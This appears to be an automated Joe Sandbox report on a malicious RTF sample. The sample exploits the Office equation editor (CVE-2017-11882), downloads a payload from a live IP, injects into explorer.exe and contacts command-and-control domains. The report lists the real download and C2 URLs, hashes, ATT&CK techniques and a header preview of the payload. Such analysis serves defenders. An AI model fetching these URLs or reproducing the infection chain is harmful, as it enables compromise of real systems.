            Source: Yara matchFile source: 4.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.442632634.00000000098BF000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.413230327.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.415523369.0000000003559000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.412873082.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.482437472.0000000000370000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.665645508.0000000001BC0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.434267788.00000000098BF000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.665856666.0000000001BF0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.482329327.0000000000130000.00000040.00020000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsShared Modules1Path InterceptionProcess Injection612Rootkit1Credential API Hooking1Security Software Discovery221Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading111LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer14Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion31NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol123SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection612LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Information Discovery113VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information4DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing13Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 528701 Sample: 3nkW4MtwSD Startdate: 25/11/2021 Architecture: WINDOWS Score: 100 37 www.troddu.com 2->37 39 troddu.com 2->39 53 Found malware configuration 2->53 55 Malicious sample detected (through community Yara rule) 2->55 57 Antivirus detection for dropped file 2->57 59 15 other signatures 2->59 10 EQNEDT32.EXE 12 2->10         started        15 WINWORD.EXE 291 19 2->15         started        signatures3 process4 dnsIp5 41 198.46.199.153, 49165, 80 AS-COLOCROSSINGUS United States 10->41 31 C:\Users\user\AppData\Local\...\vbc[1].exe, PE32 10->31 dropped 33 C:\Users\Public\vbc.exe, PE32 10->33 dropped 77 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->77 17 vbc.exe 10->17         started        35 ~WRF{85338F29-7DEE...4-3AA1C7FBE740}.tmp, Composite 15->35 dropped file6 signatures7 process8 signatures9 49 Tries to detect virtualization through RDTSC time measurements 17->49 51 Injects a PE file into a foreign processes 17->51 20 vbc.exe 17->20         started        process10 signatures11 61 Modifies the context of a thread in another process (thread injection) 20->61 63 Maps a DLL or memory area into another process 20->63 65 Sample uses process hollowing technique 20->65 67 Queues an APC in another process (thread injection) 20->67 23 raserver.exe 20->23         started        26 explorer.exe 20->26 injected process12 dnsIp13 69 Modifies the context of a thread in another process (thread injection) 23->69 71 Maps a DLL or memory area into another process 23->71 73 Tries to detect virtualization through RDTSC time measurements 23->73 29 cmd.exe 23->29         started        43 www.mountfrenchlodge.net 26->43 45 www.cuteprofessionalscrubs.com 26->45 47 2 other IPs or domains 26->47 75 System process connects to network (likely due to code injection or exploit) 26->75 signatures14 process15

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            3nkW4MtwSD.rtf56%VirustotalBrowse
            3nkW4MtwSD.rtf100%AviraHEUR/Rtf.Malformed

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{85338F29-7DEE-45E7-AE54-3AA1C7FBE740}.tmp100%AviraEXP/CVE-2017-11882.Gen
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{85338F29-7DEE-45E7-AE54-3AA1C7FBE740}.tmp100%Joe Sandbox ML

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            4.0.vbc.exe.400000.9.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            4.2.vbc.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            4.0.vbc.exe.400000.7.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            4.0.vbc.exe.400000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

            Domains

            SourceDetectionScannerLabelLink
            cuteprofessionalscrubs.com4%VirustotalBrowse
            troddu.com0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            www.cuteprofessionalscrubs.com/9gr5/0%Avira URL Cloudsafe
            http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
            http://www.iis.fhg.de/audioPA0%URL Reputationsafe
            http://198.46.199.153/70007/vbc.exe0%Avira URL Cloudsafe
            http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
            http://treyresearch.net0%URL Reputationsafe
            http://java.sun.com0%URL Reputationsafe
            http://www.icra.org/vocabulary/.0%URL Reputationsafe
            http://computername/printers/printername/.printer0%Avira URL Cloudsafe
            http://www.%s.comPA0%URL Reputationsafe
            http://www.mountfrenchlodge.net/9gr5/?gvT8Z=xQZabMU8dpACe7vSnuiwD/QS3vczr7oZL8st36+z5QOTIlaedyvl1J6mLYwfvajeV4x6zA==&wrx=KX64Xbs0GT80%Avira URL Cloudsafe
            http://www.cuteprofessionalscrubs.com/9gr5/?gvT8Z=ywSUfm2fQGK6UvQCK3y+m09HhIkd7Ec2I38ZOQmE/hAglw7BpPTyU9WfPvviQ4VjNkYSbA==&wrx=KX64Xbs0GT80%Avira URL Cloudsafe
            http://servername/isapibackend.dll0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            cuteprofessionalscrubs.com
            		34.102.136.180
            		truefalseunknown
            mountfrenchlodge.net
            		34.102.136.180
            		truefalse
              		unknown
              troddu.com
              		162.240.31.112
              		truetrueunknown
              www.troddu.com
              		unknown
              		unknowntrue
                		unknown
                www.cuteprofessionalscrubs.com
                		unknown
                		unknowntrue
                  		unknown
                  www.mountfrenchlodge.net
                  		unknown
                  		unknowntrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    www.cuteprofessionalscrubs.com/9gr5/true
                    • Avira URL Cloud: safe
                    		low
                    http://198.46.199.153/70007/vbc.exetrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.mountfrenchlodge.net/9gr5/?gvT8Z=xQZabMU8dpACe7vSnuiwD/QS3vczr7oZL8st36+z5QOTIlaedyvl1J6mLYwfvajeV4x6zA==&wrx=KX64Xbs0GT8false
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.cuteprofessionalscrubs.com/9gr5/?gvT8Z=ywSUfm2fQGK6UvQCK3y+m09HhIkd7Ec2I38ZOQmE/hAglw7BpPTyU9WfPvviQ4VjNkYSbA==&wrx=KX64Xbs0GT8false
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.windows.com/pctv.explorer.exe, 00000005.00000000.418334987.0000000002AE0000.00000002.00020000.sdmpfalse
                      		high
                      http://www.msn.com/?ocid=iehpgexplorer.exe, 00000005.00000000.421025770.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.438992148.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.457833157.000000000449C000.00000004.00000001.sdmpfalse
                        		high
                        http://investor.msn.comexplorer.exe, 00000005.00000000.418334987.0000000002AE0000.00000002.00020000.sdmpfalse
                          		high
                          http://www.msnbc.com/news/ticker.txtexplorer.exe, 00000005.00000000.418334987.0000000002AE0000.00000002.00020000.sdmpfalse
                            		high
                            http://wellformedweb.org/CommentAPI/explorer.exe, 00000005.00000000.421368152.0000000004650000.00000002.00020000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1explorer.exe, 00000005.00000000.424665846.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.423050629.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.421059058.00000000044E7000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.456041040.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.441652368.0000000008374000.00000004.00000001.sdmpfalse
                              		high
                              http://www.iis.fhg.de/audioPAexplorer.exe, 00000005.00000000.421368152.0000000004650000.00000002.00020000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEMexplorer.exe, 00000005.00000000.421288700.00000000045D6000.00000004.00000001.sdmpfalse
                                		high
                                https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1-220explorer.exe, 00000005.00000000.421059058.00000000044E7000.00000004.00000001.sdmpfalse
                                  		high
                                  http://windowsmedia.com/redir/services.asp?WMPFriendly=truevbc.exe, 00000003.00000002.417839615.0000000006BE7000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.419756160.0000000002CC7000.00000002.00020000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.hotmail.com/oeexplorer.exe, 00000005.00000000.418334987.0000000002AE0000.00000002.00020000.sdmpfalse
                                    		high
                                    http://treyresearch.netexplorer.exe, 00000005.00000000.421368152.0000000004650000.00000002.00020000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2explorer.exe, 00000005.00000000.441652368.0000000008374000.00000004.00000001.sdmpfalse
                                      		high
                                      http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkvbc.exe, 00000003.00000002.417839615.0000000006BE7000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.419756160.0000000002CC7000.00000002.00020000.sdmpfalse
                                        		high
                                        http://java.sun.comexplorer.exe, 00000005.00000000.424665846.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.456041040.0000000000255000.00000004.00000020.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.icra.org/vocabulary/.vbc.exe, 00000003.00000002.417839615.0000000006BE7000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.419756160.0000000002CC7000.00000002.00020000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.vbc.exe, 00000003.00000002.416641477.0000000006610000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.416658417.0000000001BE0000.00000002.00020000.sdmpfalse
                                          		high
                                          http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000005.00000000.433667543.0000000008418000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.435363955.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.424711356.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.423050629.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.423102805.00000000083F5000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.441652368.0000000008374000.00000004.00000001.sdmpfalse
                                            		high
                                            http://investor.msn.com/explorer.exe, 00000005.00000000.418334987.0000000002AE0000.00000002.00020000.sdmpfalse
                                              		high
                                              http://www.msn.com/?ocid=iehpexplorer.exe, 00000005.00000000.421025770.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.438992148.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.457833157.000000000449C000.00000004.00000001.sdmpfalse
                                                		high
                                                http://www.msn.com/de-de/?ocid=iehpexplorer.exe, 00000005.00000000.421025770.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.438992148.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.457833157.000000000449C000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://www.piriform.com/ccleanerexplorer.exe, 00000005.00000000.433667543.0000000008418000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.435363955.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.424711356.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.423050629.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.423102805.00000000083F5000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.421059058.00000000044E7000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.441652368.0000000008374000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://computername/printers/printername/.printerexplorer.exe, 00000005.00000000.421368152.0000000004650000.00000002.00020000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		low
                                                    http://www.%s.comPAvbc.exe, 00000003.00000002.416641477.0000000006610000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.416658417.0000000001BE0000.00000002.00020000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		low
                                                    http://www.autoitscript.com/autoit3explorer.exe, 00000005.00000000.424665846.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.456041040.0000000000255000.00000004.00000020.sdmpfalse
                                                      		high
                                                      https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=18(P&explorer.exe, 00000005.00000000.424665846.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.456041040.0000000000255000.00000004.00000020.sdmpfalse
                                                        		high
                                                        http://www.msn.com/?ocid=iehpsexplorer.exe, 00000005.00000000.420524070.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.438182629.0000000003D90000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://support.mozilla.orgexplorer.exe, 00000005.00000000.424665846.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.456041040.0000000000255000.00000004.00000020.sdmpfalse
                                                            		high
                                                            http://servername/isapibackend.dllexplorer.exe, 00000005.00000000.457413401.0000000003E50000.00000002.00020000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		low

                                                            Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public

                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            198.46.199.153
                                                            		unknownUnited States
                                                            		36352AS-COLOCROSSINGUStrue
                                                            34.102.136.180
                                                            		cuteprofessionalscrubs.comUnited States
                                                            		15169GOOGLEUSfalse

                                                            General Information

                                                            Joe Sandbox Version:34.0.0 Boulder Opal
                                                            Analysis ID:528701
                                                            Start date:25.11.2021
                                                            Start time:17:23:10
                                                            Joe Sandbox Product:CloudBasic
                                                            Overall analysis duration:0h 10m 53s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Sample file name:3nkW4MtwSD (renamed file extension from none to rtf)
                                                            Cookbook file name:defaultwindowsofficecookbook.jbs
                                                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                            Number of analysed new started processes analysed:9
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:1
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • HDC enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Detection:MAL
                                                            Classification:mal100.troj.expl.evad.winRTF@10/9@3/2
                                                            EGA Information:Failed
                                                            HDC Information:
                                                            • Successful, ratio: 16.7% (good quality ratio 16%)
                                                            • Quality average: 73.5%
                                                            • Quality standard deviation: 27.8%
                                                            HCA Information:
                                                            • Successful, ratio: 95%
                                                            • Number of executed functions: 89
                                                            • Number of non-executed functions: 50
                                                            Cookbook Comments:
                                                            • Adjust boot time
                                                            • Enable AMSI
                                                            • Found Word or Excel or PowerPoint or XPS Viewer
                                                            • Found warning dialog
                                                            • Click Ok
                                                            • Attach to Office via COM
                                                            • Scroll down
                                                            • Close Viewer
                                                            Warnings:
                                                            Show All
                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.

                                                            Simulations

                                                            Behavior and APIs

                                                            TimeTypeDescription
                                                            17:24:14API Interceptor70x Sleep call for process: EQNEDT32.EXE modified
                                                            17:24:17API Interceptor146x Sleep call for process: vbc.exe modified
                                                            17:24:55API Interceptor146x Sleep call for process: raserver.exe modified
                                                            17:25:40API Interceptor1x Sleep call for process: explorer.exe modified

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                            198.46.199.153lSBl5Mhq80.rtfGet hashmaliciousBrowse
                                                            • 198.46.199.153/76734/VBC.exe
                                                            new order.docxGet hashmaliciousBrowse
                                                            • 198.46.199.153/76734/VBC.exe
                                                            new order.xlsxGet hashmaliciousBrowse
                                                            • 198.46.199.153/68886/VBC.exe
                                                            Neue Bestellung.xlsxGet hashmaliciousBrowse
                                                            • 198.46.199.153/566665/VBC.exe
                                                            purchase order.xlsxGet hashmaliciousBrowse
                                                            • 198.46.199.153/9994/VBC.exe
                                                            neworder.xlsxGet hashmaliciousBrowse
                                                            • 198.46.199.153/566665/vbc.exe
                                                            PO 35572 FOR CONTRA 23.08.xlsxGet hashmaliciousBrowse
                                                            • 198.46.199.153/1112/VBC.exe
                                                            PO 35572 FOR CONTRA 23.08.xlsxGet hashmaliciousBrowse
                                                            • 198.46.199.153/1112/VBC.exe
                                                            quotation.xlsxGet hashmaliciousBrowse
                                                            • 198.46.199.153/1112/VBC.exe
                                                            order2123.xlsxGet hashmaliciousBrowse
                                                            • 198.46.199.153/1112/VBC.exe

                                                            Domains

                                                            No context

                                                            ASN

                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                            AS-COLOCROSSINGUSEmployee payment plan.HTMGet hashmaliciousBrowse
                                                            • 23.95.214.111
                                                            ATT67586.HTMGet hashmaliciousBrowse
                                                            • 172.245.112.92
                                                            xF3wienie.xlsxGet hashmaliciousBrowse
                                                            • 198.23.207.111
                                                            Quote Request - Linde Tunisia.xlsxGet hashmaliciousBrowse
                                                            • 107.173.191.111
                                                            PO PENANG ORDER C0023.xlsxGet hashmaliciousBrowse
                                                            • 198.12.107.117
                                                            BANK-SWIFT.xlsxGet hashmaliciousBrowse
                                                            • 107.173.229.133
                                                            1HT42224.xlsxGet hashmaliciousBrowse
                                                            • 198.23.207.36
                                                            new order.xlsxGet hashmaliciousBrowse
                                                            • 198.23.251.13
                                                            Shipping Schedule.xlsxGet hashmaliciousBrowse
                                                            • 198.12.91.205
                                                            Product_Specification_Sheet.xlsxGet hashmaliciousBrowse
                                                            • 107.173.219.26
                                                            lod2.xlsxGet hashmaliciousBrowse
                                                            • 198.23.207.36
                                                            Payment Slip.xlsxGet hashmaliciousBrowse
                                                            • 198.46.136.245
                                                            20002.xlsxGet hashmaliciousBrowse
                                                            • 198.46.136.245
                                                            lSBl5Mhq80.rtfGet hashmaliciousBrowse
                                                            • 198.46.199.153
                                                            STATEMENT OF ACCOUNT.xlsxGet hashmaliciousBrowse
                                                            • 192.227.228.37
                                                            new order.docxGet hashmaliciousBrowse
                                                            • 198.46.199.153
                                                            Amended Order.xlsxGet hashmaliciousBrowse
                                                            • 192.3.121.173
                                                            Payment Swift.xlsxGet hashmaliciousBrowse
                                                            • 198.12.107.104
                                                            SOA.xlsxGet hashmaliciousBrowse
                                                            • 107.172.13.149
                                                            Play_VM_582497.htmGet hashmaliciousBrowse
                                                            • 192.3.161.195

                                                            JA3 Fingerprints

                                                            No context

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:downloaded
                                                            Size (bytes):739840
                                                            Entropy (8bit):7.768720486449457
                                                            Encrypted:false
                                                            SSDEEP:12288:QBzcmhiTyq+0tWTpvmEwyd2NR5SR72R6/NHJbBMa59mO/1flaMMdrixBFmRq:QBomhi+2WYEFdqu5NHJbBMa5Mdri1Wq
                                                            MD5:075BD1E3E3E0C01794EE6A84BE2C585A
                                                            SHA1:984A18333BCD137D00A2223A10B83946F0B3949D
                                                            SHA-256:42173F59707DE5929C3BC6CD37D5E0DC55D990BCE2C29AA6DEAC6E86C3EEC250
                                                            SHA-512:D00A949F26740996D4DA000ABC5B5241D812D3C7D1A1D0A92863A11F825B79333F20B4105BB2EAAD67472F1229E35BD6E056A27BE5C4418D639D18AEED3FC676
                                                            Malicious:true
                                                            Reputation:low
                                                            IE Cache URL:http://198.46.199.153/70007/vbc.exe
                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a..............0..>...........[... ...`....@.. ....................................@.................................l[..O....`..H............................................................................ ............... ..H............text....<... ...>.................. ..`.rsrc...H....`.......@..............@..@.reloc...............H..............@..B.................[......H........H...!..........|j................................................s....}.....s ...}.....(!....(.....{.....o"...*.0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(*...-...........o.....*..................{....o+....{....o,...o-.....}....*.0..)........{.........(....t......|......(...+...3.*....0..)........{.........(0...t......|......(...+...3.*....0..........
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{85338F29-7DEE-45E7-AE54-3AA1C7FBE740}.tmp
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                            Category:dropped
                                                            Size (bytes):5632
                                                            Entropy (8bit):4.215971182386183
                                                            Encrypted:false
                                                            SSDEEP:48:rf6resS6fB++YrNbC4FE/9c+FhHmJspzIf:+rexCBYrNbC4KFhPzy
                                                            MD5:A553A58C04781D311C71B7DA1B7CAD57
                                                            SHA1:10AD372D975F93EDA1DC9CD9A92D45992CA85F38
                                                            SHA-256:9BC8FBA0075B6F379D906661ACE1D80A764A1022213D127E3EAC56CFF5A41779
                                                            SHA-512:8C706B34EF18F8CE68401E6B9DF47EDF10D2BE81CA7725BC480412ED4BDB146EDF03CBF502721227CB1D132313F5131E62B94774617BF462FCB9B785E3E26BB6
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Reputation:low
                                                            Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{105A16FA-9724-40E9-B86D-EF139A6795E6}.tmp
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):6656
                                                            Entropy (8bit):3.5345865006836488
                                                            Encrypted:false
                                                            SSDEEP:96:YyOv6PI3Jv6BweyjGQ803dRybHF9qXXy3dwZ4HoCmWJZ3qrlircuA:YyGZh6meu80NRybl2WbZ6rErcZ
                                                            MD5:9E74D0391BDB20A19FCE576A18E374DD
                                                            SHA1:CAD0F85D1E24708A6CE05BB7791BCD8A1DE982D4
                                                            SHA-256:1A183A30D730EAE29C9EBFBF5DC2FD0B9F40BBCEAC2FFBD896C7778AED5B937D
                                                            SHA-512:F14F7D10706E955DA2D267BC28871D2342B10E8B7CD65FA7555E3B7157C8CD03BA8831CDC896495AE542C60749766E6137E007D657AE3599FB200558716DAB9B
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview: &.-.+.4.!.?.7.$.>.|...|.:.+.%.]._...!.4.#.&...2.`.(.2...?.1.-.....+.|.$.>.=.8.+...0.3.0.+.4.*.?.%./.+.~.,.<.6.6.7.<.?.?.?.%.)./.|.>.!.|.!...%.|.^.?.`...3.'.?.|.8.-.).?.'.%.%.$.6.^.;.,.?.%.7...$.?.9.8.3.(.2.(.+.?...?.|.=...8.?.8.|.*.7.,.!.5._.^.].5.|.7.,.[.?.?.3...!...0.'.).?.8...?.6.&.5.3...;.`.'.?./.2.%.?.?.4.1.?.%._.+.*.`.).%.^.-.*.&.>.,.9.6.(...[.~.3.?.2...=.,.`.7.8.).!.%.?.8.1.^.).7.3.6...@.[._.?...6.7.%.?.+.-.&.:.@.?.?.=.>.0.>.;.3.).?...+.0.].=.?.~.?._.?.].?.$.8.2.;.@.%.7.=.~.<.3.!.3.2.@...2.7.6.9.5.'.7.~.#./.].5./.<.=.:.9.!.8.9.].3.;.4.>._.>.@.....?.@.?.`.?.9.-.(.*.;.;.4.1.].?.^...,.*.[.<.8.].....?.?._.%.?.>.:.8.-.7.5.?.~.:.%.:._.3.7.@.'.[.0.+.%.9.;.$.9.^...:.:.9.?...(.[.>.$.:.|.3...,.|.$.&.&.?.;.3.3.>...4./.5.+.7.3.%.'.1.3.4.3.=.?.;.@.3.!.?.3.'...*.[...,.#.'./.5.&.!.!.*.:.3.~.?.2./.&.%.#.?.?.(.?._...[.4.*...*.^...<.^.,.|.(.,.[.?.(.).?.4.].-.+.<.*.?.%.%.>...&.).0.*.`.%.8.0.=.>.(.,.`...-...[.0.;.?.#.<.1.,.-.0.:.'.$.2.@.'.(.$.!._.3.;.].!.,.8.....6...0.?.-.?.3.'.9.0.@.,.].*.@.@.%.<.
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B3E201F6-E172-4FB7-8EA2-C5E78A0177C3}.tmp
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):1024
                                                            Entropy (8bit):0.05390218305374581
                                                            Encrypted:false
                                                            SSDEEP:3:ol3lYdn:4Wn
                                                            MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                            Malicious:false
                                                            Reputation:high, very likely benign file
                                                            Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
